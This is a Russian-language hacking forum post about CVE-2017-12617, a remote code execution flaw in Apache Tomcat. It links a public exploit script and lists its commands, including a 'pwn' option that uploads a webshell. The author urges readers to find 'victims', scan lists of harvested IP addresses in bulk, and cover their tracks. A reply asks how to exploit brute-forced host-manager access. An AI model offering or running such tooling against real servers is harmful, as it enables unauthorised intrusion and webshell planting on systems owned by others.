Статья CVE-2017-12617 Apache Tomcat

Приветствую обитателей форума и гостей которые тоже станут надеюсь в ближайшее время обитателями)
В этой статье речь пойдет о скрипте который експлуатирует уязвимые движки на которых крутятся сайты, а именно Apache Tomcat< 9.0.1 (Beta)/< 8.5.23/< 8.0.47/< 7.0.8 -JSP

Експлойт срабатывает при таких вот условиях:

"если servlet по умолчанию настроен с параметром readonly, установленным на false или servlet --> WebDAV включен с параметром readonly, то есть установленным на false"

Официальное название уязвимостей (маркировка) CVE-2017-12617 critical Remote Code Execution (RCE) vulnerability discovered in Apache Tomcat

Ну и конечно же представлю Вам скрипт, который в сваю очередь прекрасно это все дело эксплуатирует под нужными условиями!

git clone https://github.com/cyberheartmi9/CVE-2017-12617.git

НАХодим жертв:

Вы видите какую версию Apache Tomcat я искал в данной статье) какие Вам искать, решать Вам, все уязвимые версии указаны выше!

функционал скрипта радует тем что можно в txt файл залить найденные IP адреса и дружно их все чекнуть на уязвимось.

./cve-2017-12617.py [options]

options:

-u ,–url [::] check target url if it’s vulnerable
-p,–pwn [::] generate webshell and upload it
-l,–list [::] hosts list

[+]usage:

./cve-2017-12617.py -u http://127.0.0.1
./cve-2017-12617.py –url http://127.0.0.1
./cve-2017-12617.py -u http://127.0.0.1 -p pwn
./cve-2017-12617.py –url http://127.0.0.1 -pwn pwn
./cve-2017-12617.py -l hotsts.txt
./cve-2017-12617.py –list hosts.txt

и если ВАМ выдало вот такую вот надпись:

то Вам повезло))

Удачи!)) помните про свои ..опы, прикрывайте их, холодает))

 

[ActionNum]

Приветсвую, интересует такой момент. Не разбирались ли вы с атаками на Apache Tomcat 0.7.61 когда вам удалось сбрутить доступ к host manager консоли?
По сути там из функционала только создание виртуального хоста и все. Можно ли как то воспользоваться этим доступом? Спасибо